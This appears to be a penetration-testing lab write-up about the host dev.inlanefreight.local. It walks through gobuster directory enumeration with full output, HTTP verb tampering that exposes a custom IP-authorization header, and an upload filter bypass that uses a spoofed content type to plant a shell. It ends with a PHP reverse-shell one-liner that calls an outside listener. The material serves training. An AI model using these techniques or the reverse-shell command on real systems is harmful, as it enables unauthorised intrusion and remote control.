dev.inlanefreight.local

Just a login page. But its a dev page so we gotta dig deeper. I tried SQL injection attacks but didn't work.

Sub-directory Brute Force

gobuster dir -u http://dev.inlanefreight.local -w /usr/share/wordlists/dirb/common.txt -x .php -t 300

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.inlanefreight.local
[+] Method:                  GET
[+] Threads:                 300
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php        (Status: 403) [Size: 288]
/.htaccess.php        (Status: 403) [Size: 288]
/.htaccess            (Status: 403) [Size: 288]
/.htpasswd            (Status: 403) [Size: 288]
/.hta                 (Status: 403) [Size: 288]
/.hta.php             (Status: 403) [Size: 288]
/.php                 (Status: 403) [Size: 288]
/css                  (Status: 301) [Size: 332] [--> http://dev.inlanefreight.local/css/]
/images               (Status: 301) [Size: 335] [--> http://dev.inlanefreight.local/images/]
/index.php            (Status: 200) [Size: 2048]
/index.php            (Status: 200) [Size: 2048]
/js                   (Status: 301) [Size: 331] [--> http://dev.inlanefreight.local/js/]
/server-status        (Status: 403) [Size: 288]
/upload.php           (Status: 200) [Size: 14]
/uploads              (Status: 301) [Size: 336] [--> http://dev.inlanefreight.local/uploads/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

The uploads .php and directory caught my attention. It show code 200 for the .php page but when I try to open it I get 403 forbidden. Which is weird so I open it in burp.

HTTP Verb Tampering

Using OPTIONS we see that the following options are allowed.

I tried all of them and only POST, TRACKS seem to work. Apparently TRACK option shows us that X-Custom-IP-Authorization: header is set in the HTTP response.

Adding this option to our request and sending it gives us an interesting webpage that says 'development mode'

Opening it in browser gives us the option to uplaod files. Only images are allowed.

The restriction can be bypassed by changing the file content type header field and we are able to upload the shell. And we get RCE.

Sadly this is out of scope :(

I wanted a reverse shell so I started a listener and ran this:

php -r '$sock=fsockopen("10.10.15.244",1337);exec("/bin/bash -i <&3 >&3 2>&3");'

Previouscareers.inlanefreight.local Nextir.inlanefreight.local

Last updated 10 months ago